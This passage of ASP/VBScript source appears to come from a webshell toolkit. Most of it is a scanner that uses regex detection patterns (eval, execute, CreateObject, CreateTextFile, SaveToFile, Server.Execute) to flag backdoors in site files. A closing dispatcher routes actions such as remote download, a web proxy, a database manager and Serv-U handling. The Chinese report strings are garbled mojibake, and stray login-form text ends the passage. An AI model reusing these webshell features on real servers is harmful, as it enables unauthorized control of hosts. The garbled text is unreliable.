Report = Report&"<tr><td>"&temp&"</td><td>(vbscript|jscript|＆#106avascript).Encode</td><td><font color=red>??o???＆#177;?＆#177;??＆#243;?＆#252;＆#225;?</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
regEx.Pattern = "\bEv"&"al\b"
If regEx.Test(filetxt) Then
Report = Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()oˉ＆#234;y?＆#233;＆#242;??′DD＆#232;?＆#242;aASP′＆#250;??￡?＆#177;?＆#242;?D?o＆#243;??＆#224;?＆#243;??￡??D?＆#234;?＆#242;?＆#176;?＆#234;?￡oev"&"al(X)<br>μ?＆#234;?＆#106avascript′＆#250;???D＆#242;2?＆#233;＆#242;?＆#234;1＆#243;?￡?＆#243;D?＆#233;?＆#252;＆#234;??＆#243;＆#177;＆#168;?￡"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
regEx.Pattern = "[^.]\bExe"&"cute\b"
If regEx.Test(filetxt) Then
Report = Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font color=red>e"&"xecute()oˉ＆#234;y?＆#233;＆#242;??′DD＆#232;?＆#242;aASP′＆#250;??￡?＆#177;?＆#242;?D?o＆#243;??＆#224;?＆#243;??￡??D?＆#234;?＆#242;?＆#176;?＆#234;?￡oex"&"ecute(X)</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
regEx.Pattern = "\.(Open|Create)TextFile\b"
If regEx.Test(filetxt) Then
Report = Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>＆#234;1＆#243;?＆#225;?FSOμ?CreateTextFile|OpenTextFileoˉ＆#234;y?＆#225;D′???t"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
regEx.Pattern = "\.SaveToFile\b"
If regEx.Test(filetxt) Then
Report = Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>＆#234;1＆#243;?＆#225;?Streamμ?SaveToFileoˉ＆#234;yD′???t"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
If regEx.Test(filetxt) Then
Report = Report&"<tr><td>"&temp&"</td><td>.Save</td><td>＆#234;1＆#243;?＆#225;?XMLHTTPμ?Saveoˉ＆#234;yD′???t"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.value, Instr(Match.value, """") + 1, Len(Match.value) - Instr(Match.value, """") - 1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--\s*#include\s*virtual\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.value, Instr(Match.value, """") + 1, Len(Match.value) - Instr(Match.value, """") - 1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
Call ScanFile( Server.MapPath("\")&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|$)"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.value, Instr(Match.value, """") + 1, Len(Match.value) - Instr(Match.value, """") - 1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()[^""]$"
If regEx.Test(filetxt) Then
Report = Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font color=red>2??＆#252;?＆#250;＆#215;＆#249;?＆#236;2＆#233;Server.e"&"xecute()oˉ＆#234;y?′DDμ????t?￡??1＆#252;＆#224;＆#237;?＆#177;＆#215;?DD?＆#236;2＆#233;</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
Set Matches = Nothing
Set regEx = Nothing
Set XregEx = New RegExp
XregEx.IgnoreCase = True
XregEx.Global = True
XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>"
Set XMatches = XregEx.Execute(filetxt)
For Each Match in XMatches
tmpLake2 = Mid(Match.value, 1, InStr(Match.value, ">"))
srcSeek = InStr(1, tmpLake2, "src", 1)
If srcSeek > 0 Then
srcSeek2 = instr(srcSeek, tmpLake2, "=")
For i = 1 To 50
tmp = Mid(tmpLake2, srcSeek2 + i, 1)
If tmp <> " " and tmp <> chr(9) and tmp <> vbCrLf Then
Exit For
End If
Next
If tmp = """" Then
tmpName = Mid(tmpLake2, srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 - i - 1)
Else
If InStr(srcSeek2 + i + 1, tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName = tmpLake2
If InStr(tmpName, chr(9)) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
If InStr(tmpName, vbCrLf) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
If InStr(tmpName, ">") > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
End If
Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")&"\","",1,1,1))
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "CreateO"&"bject[ |\t]*$.*$"
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
If Instr(Match.value, "&") or Instr(Match.value, "+") or Instr(Match.value, """") = 0 or Instr(Match.value, "(") <> InStrRev(Match.value, "(") Then
Report = Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObjectoˉ＆#234;y＆#234;1＆#243;?＆#225;?＆#177;?D???＆#234;??￡?＆#233;?＆#252;＆#234;??＆#243;＆#177;＆#168;"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
exit sub
End If
Next
Set Matches = Nothing
Set regEx = Nothing
end if
set ofile = nothing
set FSO1s = nothing
End Sub
Function CheckExt(FileExt)
If DimFileExt = "*" Then CheckExt = True
Ext = Split(DimFileExt,",")
For i = 0 To Ubound(Ext)
If Lcase(FileExt) = Ext(i) Then
CheckExt = True
Exit Function
End If
Next
End Function
Function GetDateModify(filepath)
Set F2SO = CreateObject("Scripting.FileSystemObject")
     Set f = F2SO.GetFile(filepath)
s = f.DateLastModified
set f = nothing
set F2SO = nothing
GetDateModify = s
End Function
Function GetDateCreate(filepath)
Set F3SO = CreateObject("Scripting.FileSystemObject")
     Set f = F3SO.GetFile(filepath)
s = f.DateCreated
set f = nothing
set F3SO = nothing
GetDateCreate = s
End Function
Function tURLEncode(Str)
temp = Replace(Str, "%", "%25")
temp = Replace(temp, "#", "%23")
temp = Replace(temp, "&", "%26")
tURLEncode = temp
End Function
Sub ShowAllFile2(Path)
Set F4SO = CreateObject("Scripting.FileSystemObject")
if not F4SO.FolderExists(path) then exit sub
Set f = F4SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F4SO.GetExtensionName(path&"\"&myfile.name)) Then
Call IsFind(Path&"\"&myfile.name)
SumFiles = SumFiles + 1
End If
Next
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile2 path&"\"&f1.name
SumFolders = SumFolders + 1
     Next
Set F4SO = Nothing
End Sub
Sub IsFind(thePath)
theDate = GetDateModify(thePath)
on error resume next
theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
if err then exit Sub
xDate = Split(request.Form("Search_Date"),";")
If request.Form("Search_Date") = "ALL" Then ALLTime = True
For i = 0 To Ubound(xDate)
If theTmp = xDate(i) or ALLTime = True Then
If request("Search_Content") <> "" Then
Set FSO2s = CreateObject("Scripting.FileSystemObject")
set ofile = FSO2s.OpenTextFile(thePath, 1, false, -2)
filetxt = Lcase(ofile.readall())
If Instr( filetxt, LCase(request.Form("Search_Content"))) > 0 Then
temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a>"
Report = Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
ofile.close()
Set ofile = Nothing
Set FSO2s = Nothing
Else
temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a>"
Report = Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
End If
Next
End Sub

case "Cplgm"
plgm()
case "PageWebProxy"
PageWebProxy()
case "txtsearch"
txtsearch()
case "DbManager"
DbManager()
Case "CreateMdb":CreateMdb FName
case "remotedown"
remotedown()
' Case "CompactMdb":CompactMdb FName
case else mainform()
end select
rem =============================================

if Action<>"servu" then ShowErr()
echo"</body></html>"

UserName：

Password：

ForgetPassword？